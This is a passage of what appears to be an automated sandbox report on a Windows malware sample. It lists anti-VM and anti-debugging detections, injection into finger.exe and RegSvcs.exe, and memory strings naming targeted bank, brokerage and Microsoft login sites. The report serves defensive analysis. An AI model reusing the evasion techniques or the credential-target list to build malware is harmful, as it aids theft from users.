                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\finger.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\finger.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\finger.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\finger.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\finger.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

                Malware Analysis System Evasion

                barindex
                Yara detected AntiVM3
                Source: Yara matchFile source: Process Memory Space: oss4CtI8oz.exe PID: 6728, type: MEMORYSTR
                Switches to a custom stack to bypass stack traces
                Source: C:\Windows\SysWOW64\finger.exeAPI/Special instruction interceptor: Address: 7FF9B762D324
                Source: C:\Windows\SysWOW64\finger.exeAPI/Special instruction interceptor: Address: 7FF9B762D7E4
                Source: C:\Windows\SysWOW64\finger.exeAPI/Special instruction interceptor: Address: 7FF9B762D944
                Source: C:\Windows\SysWOW64\finger.exeAPI/Special instruction interceptor: Address: 7FF9B762D504
                Source: C:\Windows\SysWOW64\finger.exeAPI/Special instruction interceptor: Address: 7FF9B762D544
                Source: C:\Windows\SysWOW64\finger.exeAPI/Special instruction interceptor: Address: 7FF9B762D1E4
                Source: C:\Windows\SysWOW64\finger.exeAPI/Special instruction interceptor: Address: 7FF9B7630154
                Source: C:\Windows\SysWOW64\finger.exeAPI/Special instruction interceptor: Address: 7FF9B762DA44
                Source: C:\Users\user\Desktop\oss4CtI8oz.exeMemory allocated: 12F0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\oss4CtI8oz.exeMemory allocated: 2DA0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\oss4CtI8oz.exeMemory allocated: 2CA0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\oss4CtI8oz.exeMemory allocated: 90B0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\oss4CtI8oz.exeMemory allocated: 7950000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\oss4CtI8oz.exeMemory allocated: A0B0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\oss4CtI8oz.exeMemory allocated: B0B0000 memory reserve | memory write watchJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0139096E rdtsc 4_2_0139096E
                Source: C:\Users\user\Desktop\oss4CtI8oz.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3154Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 446Jump to behavior
                Source: C:\Windows\SysWOW64\finger.exeWindow / User API: threadDelayed 9834Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeAPI coverage: 0.7 %
                Source: C:\Windows\SysWOW64\finger.exeAPI coverage: 2.8 %
                Source: C:\Users\user\Desktop\oss4CtI8oz.exe TID: 6784Thread sleep time: -922337203685477s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3844Thread sleep time: -1844674407370954s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3620Thread sleep time: -922337203685477s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\finger.exe TID: 6772Thread sleep count: 136 > 30Jump to behavior
                Source: C:\Windows\SysWOW64\finger.exe TID: 6772Thread sleep time: -272000s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\finger.exe TID: 6772Thread sleep count: 9834 > 30Jump to behavior
                Source: C:\Windows\SysWOW64\finger.exe TID: 6772Thread sleep time: -19668000s >= -30000sJump to behavior
                Source: C:\Program Files (x86)\MalPRrQeWEUjxNEYPLkWdCuSzAIOwzdgNEIZeJTUBphatQyWtkWxHRKmsimM\DzuG1v7KGGzqI4w.exe TID: 6768Thread sleep time: -85000s >= -30000sJump to behavior
                Source: C:\Program Files (x86)\MalPRrQeWEUjxNEYPLkWdCuSzAIOwzdgNEIZeJTUBphatQyWtkWxHRKmsimM\DzuG1v7KGGzqI4w.exe TID: 6768Thread sleep count: 37 > 30Jump to behavior
                Source: C:\Program Files (x86)\MalPRrQeWEUjxNEYPLkWdCuSzAIOwzdgNEIZeJTUBphatQyWtkWxHRKmsimM\DzuG1v7KGGzqI4w.exe TID: 6768Thread sleep time: -55500s >= -30000sJump to behavior
                Source: C:\Program Files (x86)\MalPRrQeWEUjxNEYPLkWdCuSzAIOwzdgNEIZeJTUBphatQyWtkWxHRKmsimM\DzuG1v7KGGzqI4w.exe TID: 6768Thread sleep count: 45 > 30Jump to behavior
                Source: C:\Program Files (x86)\MalPRrQeWEUjxNEYPLkWdCuSzAIOwzdgNEIZeJTUBphatQyWtkWxHRKmsimM\DzuG1v7KGGzqI4w.exe TID: 6768Thread sleep time: -45000s >= -30000sJump to behavior
                Source: C:\Windows\System32\svchost.exe TID: 5224Thread sleep time: -30000s >= -30000sJump to behavior
                Source: C:\Windows\System32\svchost.exe TID: 5228Thread sleep time: -30000s >= -30000sJump to behavior
                Source: C:\Windows\System32\svchost.exeFile opened: PhysicalDrive0Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeLast function: Thread delayed
                Source: C:\Windows\SysWOW64\finger.exeLast function: Thread delayed
                Source: C:\Windows\SysWOW64\finger.exeLast function: Thread delayed
                Source: C:\Windows\SysWOW64\finger.exeCode function: 7_2_0086CB70 FindFirstFileW,FindNextFileW,FindClose,7_2_0086CB70
                Source: C:\Users\user\Desktop\oss4CtI8oz.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: finger.exe, 00000007.00000002.3343159690.0000000007B74000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: nge Transaction PasswordVMware20,11696494690^
                Source: 4ub-1K1Qxn.7.drBinary or memory string: ms.portal.azure.comVMware20,11696494690
                Source: 4ub-1K1Qxn.7.drBinary or memory string: discord.comVMware20,11696494690f
                Source: 4ub-1K1Qxn.7.drBinary or memory string: AMC password management pageVMware20,11696494690
                Source: 4ub-1K1Qxn.7.drBinary or memory string: outlook.office.comVMware20,11696494690s
                Source: finger.exe, 00000007.00000002.3343159690.0000000007B74000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU East & CentralVMware20,1)
                Source: 4ub-1K1Qxn.7.drBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696494690
                Source: 4ub-1K1Qxn.7.drBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696494690p
                Source: 4ub-1K1Qxn.7.drBinary or memory string: Interactive Brokers - EU WestVMware20,11696494690n
                Source: finger.exe, 00000007.00000002.3343159690.0000000007B74000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.comVMware20
                Source: 4ub-1K1Qxn.7.drBinary or memory string: interactivebrokers.comVMware20,11696494690
                Source: 4ub-1K1Qxn.7.drBinary or memory string: netportal.hdfcbank.comVMware20,11696494690
                Source: 4ub-1K1Qxn.7.drBinary or memory string: interactivebrokers.co.inVMware20,11696494690d
                Source: 4ub-1K1Qxn.7.drBinary or memory string: account.microsoft.com/profileVMware20,11696494690u
                Source: 4ub-1K1Qxn.7.drBinary or memory string: outlook.office365.comVMware20,11696494690t
                Source: svchost.exe, 0000000A.00000002.2851606177.00000266E4453000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                Source: 4ub-1K1Qxn.7.drBinary or memory string: www.interactivebrokers.comVMware20,11696494690}
                Source: 4ub-1K1Qxn.7.drBinary or memory string: microsoft.visualstudio.comVMware20,11696494690x
                Source: 4ub-1K1Qxn.7.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696494690^
                Source: 4ub-1K1Qxn.7.drBinary or memory string: Test URL for global passwords blocklistVMware20,11696494690
                Source: finger.exe, 00000007.00000002.3337828652.0000000000BAE000.00000004.00000020.00020000.00000000.sdmp, DzuG1v7KGGzqI4w.exe, 00000009.00000002.3339421772.0000000000949000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000000D.00000002.1379074090.000002AF5AC1C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                Source: 4ub-1K1Qxn.7.drBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696494690z
                Source: 4ub-1K1Qxn.7.drBinary or memory string: trackpan.utiitsl.comVMware20,11696494690h
                Source: 4ub-1K1Qxn.7.drBinary or memory string: tasks.office.comVMware20,11696494690o
                Source: 4ub-1K1Qxn.7.drBinary or memory string: www.interactivebrokers.co.inVMware20,11696494690~
                Source: oss4CtI8oz.exe, 00000000.00000002.954564043.0000000007208000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                Source: 4ub-1K1Qxn.7.drBinary or memory string: Interactive Brokers - COM.HKVMware20,11696494690
                Source: finger.exe, 00000007.00000002.3340993158.0000000004FCE000.00000004.10000000.00040000.00000000.sdmp, DzuG1v7KGGzqI4w.exe, 00000009.00000002.3340314357.0000000003DFE000.00000004.00000001.00040000.00000000.sdmpBinary or memory string: <p><a href="https://www.star.ne.jp/"><img src="data:image/gif;base64,R0lGODlhmAAbAPcAAJORkXPC5+vr6o6NjAmT1SSf2ujo6K3b8R6c2YyKihCW1vb29vHx8eLi4trv+Wm+5qalpc/OzmK65LTe8qLW702w4ZaVlJ6dne3t7ZrS7jyp3oXJ6tLr939+fcbm9XZ0dACDz0lHRun1+xWY13p4eFhWVSOe2ubm5vj4+KTX8MjIyECr3+Tk5ACK0sTExCKe2VCy4TGl3OHy+l245OHh4cHk9fX6/VS04tPT01ZVVEE/PqnZ8AaS1QCN0z08Ozw6OURDQlxaWU9NTIiHh0eu4Pr9/gSR1F5dXGRjYmNhYYqJiFNRUM7p9wCI0VtZWbjg85qZmXx7emdlZYF/fyag2r29vBiZ2ACF0A2U1nh3dtbt+HRzcoKBgP///29ubb7j9BKX17Ld8jmn3YSCgnnE6GxramhnZgqT1QaR1AKQ1AKP1Dg2NSCd2cHBwEZEQ93c3CGd2fb29Y2Miyqi2/T09PPz89nY2KGgoL6+ve7u7la14vz8/N/f34mIh8fGxjs5OMrJyfr6+mBeXfv7+6inpjk3NmloZ62srNbW1rKxsd7e3vX19To4N8LCwSGe2e/v7/7+/kdFRKuqqVpYV1VTUkJAP0Os3/Ly8tbV1Q+W1pybmqiop5GQj11cW/39/cbFxUNBQExKSa6tra+urabY8O/u7rm4uLq6udjY18vKyv7//yig2ra1taqpqZ2cm1JQT2a85eDf37y7u09OTff8/ktJSE5MS6Ggn/r5+bq5uJCPj7++voWEg/Py8tXU1MPCwtrZ2cro9qKhoWW75aurqg+V1p/V77W0tLOzsra2tWy+5pWUk7Cvryaf2kWt3zam3ZeWlimi25mYl0pIRxyb2IvM62VkYxma2KCfnsTDw4GAf1ZUU4eGhRSX1xOT1QKQ01i146+vruf0+8Dj9MjHx4HI6j89PLe2tuTz+/L5/dDQz+33/MzMzM7NzQB8zRCV1ufn5nNxcJDO7OPj4q/c8ayrq9ra2tHQ0NLR0bGwsLOysaOioqmoqNTU06XY7wyU1SH/C1hNUCBEYXRhWE1QPD94cGFja2V0IGJlZ2luPSLvu78iIGlkPSJXNU0wTXBDZWhpSHpyZVN6TlRjemtjOWQiPz4gPHg6eG1wbWV0YSB4bWxuczp4PSJhZG9iZTpuczptZXRhLyIgeDp4bXB0az0iQWRvYmUgWE1QIENvcmUgNS42LWMxMzggNzkuMTU5ODI0LCAyMDE2LzA5LzE0LTAxOjA5OjAxICAgICAgICAiPiA8cmRmOlJERiB4bWxuczpyZGY9Imh0dHA6Ly93d3cudzMub3JnLzE5OTkvMDIvMjItcmRmLXN5bnRheC1ucyMiPiA8cmRmOkRlc2NyaXB0aW9uIHJkZjphYm91dD0iIiB4bWxuczp4bXBNTT0iaHR0cDovL25zLmFkb2JlLmNvbS94YXAvMS4wL21tLyIgeG1sbnM6c3RSZWY9Imh0dHA6Ly9ucy5hZG9iZS5jb20veGFwLzEuMC9zVHlwZS9SZXNvdXJjZVJlZiMiIHhtbG5zOnhtcD0iaHR0cDovL25zLmFkb2JlLmNvbS94YXAvMS4wLyIgeG1wTU06T3JpZ2luYWxEb2N1bWVudElEPSJ4bXAuZGlkOjk5NTgzMjIwLWJlMzItMzE0OC05YTM2LThjMjIwOGQwNjhkMyIgeG1wTU06RG9jdW1lbnRJRD0ieG1wLmRpZDpFNDk5NUIzQzFEOEIxMUU3OTBCOEU0NDZDMzE4NTM3RiIgeG1wTU06SW5zdGFuY2VJRD0ieG1wLmlpZDpFNDk5NUIzQjFEOEIxMUU3OTBCOEU0NDZDMzE4NTM3RiIgeG1wOkNyZWF0b3JUb29sPSJBZG9iZSBQaG90b3Nob3AgQ0MgMjAxNyAoV2luZG93cykiPiA8eG1wTU06RGVyaXZlZEZyb20gc3RSZWY6aW5zdGFuY2VJRD0ieG1wLmlpZDo3NWU3N2M0ZC1iMjc5LWJhNGYtYjg0Ny04OGRhN2Y4NTFiYjIiIHN0UmVmOmRvY3VtZW50SUQ9InhtcC5kaWQ6OTk1ODMyMjAtYmUzMi0zMTQ4LTlhMzYtOGMyMjA4ZDA2OGQzIi8+IDwvcmRmOkRlc2NyaXB0aW9uPiA8L3JkZjpSREY+IDwveDp4bXBtZXRhPiA8P3hwYWNrZXQgZW5kPSJyIj8+Af/+/fz7+vn49/b19PPy8fDv7u3s6+rp6Ofm5eTj4uHg397d3Nva2djX1tXU09LR0M/OzczLysnIx8bFxMPCwcC/vr28u7q5uLe2tbSzsrGwr66trKuqqainpqWko6KhoJ+enZybmpmYl5aVlJOSkZCPjo2Mi4qJiIeGhYSDgoGAf359fHt6eXh3dnV0c3JxcG9ubWxramloZ2ZlZGNiYWBfXl1cW1pZWFdWVVRTUlFQT05NTEtKSUhHRkVEQ0JBQD8+PTw7Ojk4NzY1NDMyMTAvLi0sKyopKCcmJSQjIiEgHx4dHBsaGRgXFhUUExIREA8ODQwLCgkIBwYFBAMCAQAAIfkEAAAAAAAsAAAAAJgAGwAACP8Auwgc2IUDrBhzEipUqEwLwYcQI0qcSLGixYsYM2qM+ISNx48vFPAgMLIAHA4bU6pcybJlygkgP6aJUYFIhRjdTFhyybOnz58Tw8SEw6YJjHQEVxBgIwOo06dQMR4YWvQGRDFLm1K0B2FAlCGuPj2KOjECtj5f90WIQ/YpKapGrxrRqWoinzJr8updAwDiAgZQVXTaWygvq7ZAU8CdIZcoE7s/COvFM3DeqA6RhD11IVmvIsQ+ayxuzKYGxcF6O2gCkARUnoGC9PJzusCHXh3cNCUoUQK0T0tDjcB6uC5GE8eQIOvFQbBOcoFIZEtkwGLsRQyeBFa5Taf5dHiDLNb/wZ59owA
                Source: 4ub-1K1Qxn.7.drBinary or memory string: dev.azure.comVMware20,11696494690j
                Source: 4ub-1K1Qxn.7.drBinary or memory string: global block list test formVMware20,11696494690
                Source: svchost.exe, 0000000A.00000002.2850550623.00000266DEE2B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW@gE
                Source: oss4CtI8oz.exe, 00000000.00000002.966088483.0000000007340000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: v0fKoVMCid
                Source: 4ub-1K1Qxn.7.drBinary or memory string: turbotax.intuit.comVMware20,11696494690t
                Source: 4ub-1K1Qxn.7.drBinary or memory string: bankofamerica.comVMware20,11696494690x
                Source: 4ub-1K1Qxn.7.drBinary or memory string: Canara Transaction PasswordVMware20,11696494690}
                Source: finger.exe, 00000007.00000002.3343159690.0000000007B74000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CDYNVMware20,11696494690p
                Source: 4ub-1K1Qxn.7.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696494690
                Source: 4ub-1K1Qxn.7.drBinary or memory string: Interactive Brokers - HKVMware20,11696494690]
                Source: 4ub-1K1Qxn.7.drBinary or memory string: Canara Transaction PasswordVMware20,11696494690x
                Source: 4ub-1K1Qxn.7.drBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696494690
                Source: 4ub-1K1Qxn.7.drBinary or memory string: secure.bankofamerica.comVMware20,11696494690|UE
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess queried: DebugPortJump to behavior
                Source: C:\Windows\SysWOW64\finger.exeProcess queried: DebugPortJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0139096E rdtsc 4_2_0139096E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_00417E13 LdrLoadDll,4_2_00417E13
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_01380124 mov eax, dword ptr fs:[00000030h]4_2_01380124
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_013FA118 mov ecx, dword ptr fs:[00000030h]4_2_013FA118
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_013FA118 mov eax, dword ptr fs:[00000030h]4_2_013FA118
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_013FA118 mov eax, dword ptr fs:[00000030h]4_2_013FA118
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_013FA118 mov eax, dword ptr fs:[00000030h]4_2_013FA118
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_01410115 mov eax, dword ptr fs:[00000030h]4_2_01410115
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_01356154 mov eax, dword ptr fs:[00000030h]4_2_01356154
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_01356154 mov eax, dword ptr fs:[00000030h]4_2_01356154
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0134C156 mov eax, dword ptr fs:[00000030h]4_2_0134C156
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_013E8158 mov eax, dword ptr fs:[00000030h]4_2_013E8158
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_013E4144 mov eax, dword ptr fs:[00000030h]4_2_013E4144
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_013E4144 mov eax, dword ptr fs:[00000030h]4_2_013E4144
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_013E4144 mov ecx, dword ptr fs:[00000030h]4_2_013E4144
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_013E4144 mov eax, dword ptr fs:[00000030h]4_2_013E4144
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_013E4144 mov eax, dword ptr fs:[00000030h]4_2_013E4144
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_014161C3 mov eax, dword ptr fs:[00000030h]4_2_014161C3
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_014161C3 mov eax, dword ptr fs:[00000030h]4_2_014161C3
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_013D019F mov eax, dword ptr fs:[00000030h]4_2_013D019F
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_013D019F mov eax, dword ptr fs:[00000030h]4_2_013D019F
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_013D019F mov eax, dword ptr fs:[00000030h]4_2_013D019F
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_013D019F mov eax, dword ptr fs:[00000030h]4_2_013D019F
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0134A197 mov eax, dword ptr fs:[00000030h]4_2_0134A197
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0134A197 mov eax, dword ptr fs:[00000030h]4_2_0134A197
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0134A197 mov eax, dword ptr fs:[00000030h]4_2_0134A197
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_014261E5 mov eax, dword ptr fs:[00000030h]4_2_014261E5
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_01390185 mov eax, dword ptr fs:[00000030h]4_2_01390185
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_013F4180 mov eax, dword ptr fs:[00000030h]4_2_013F4180
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_013F4180 mov eax, dword ptr fs:[00000030h]4_2_013F4180
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_013801F8 mov eax, dword ptr fs:[00000030h]4_2_013801F8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0140C188 mov eax, dword ptr fs:[00000030h]4_2_0140C188
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0140C188 mov eax, dword ptr fs:[00000030h]4_2_0140C188
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_013CE1D0 mov eax, dword ptr fs:[00000030h]4_2_013CE1D0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_013CE1D0 mov eax, dword ptr fs:[00000030h]4_2_013CE1D0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_013CE1D0 mov ecx, dword ptr fs:[00000030h]4_2_013CE1D0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_013CE1D0 mov eax, dword ptr fs:[00000030h]4_2_013CE1D0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_013CE1D0 mov eax, dword ptr fs:[00000030h]4_2_013CE1D0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_013E6030 mov eax, dword ptr fs:[00000030h]4_2_013E6030
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0134A020 mov eax, dword ptr fs:[00000030h]4_2_0134A020
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0134C020 mov eax, dword ptr fs:[00000030h]4_2_0134C020
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0136E016 mov eax, dword ptr fs:[00000030h]4_2_0136E016
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0136E016 mov eax, dword ptr fs:[00000030h]4_2_0136E016
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0136E016 mov eax, dword ptr fs:[00000030h]4_2_0136E016
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0136E016 mov eax, dword ptr fs:[00000030h]4_2_0136E016
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_013D4000 mov ecx, dword ptr fs:[00000030h]4_2_013D4000
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_013F2000 mov eax, dword ptr fs:[00000030h]4_2_013F2000
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_013F2000 mov eax, dword ptr fs:[00000030h]4_2_013F2000
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_013F2000 mov eax, dword ptr fs:[00000030h]4_2_013F2000
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_013F2000 mov eax, dword ptr fs:[00000030h]4_2_013F2000
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_013F2000 mov eax, dword ptr fs:[00000030h]4_2_013F2000
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_013F2000 mov eax, dword ptr fs:[00000030h]4_2_013F2000
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_013F2000 mov eax, dword ptr fs:[00000030h]4_2_013F2000
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_013F2000 mov eax, dword ptr fs:[00000030h]4_2_013F2000
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0137C073 mov eax, dword ptr fs:[00000030h]4_2_0137C073
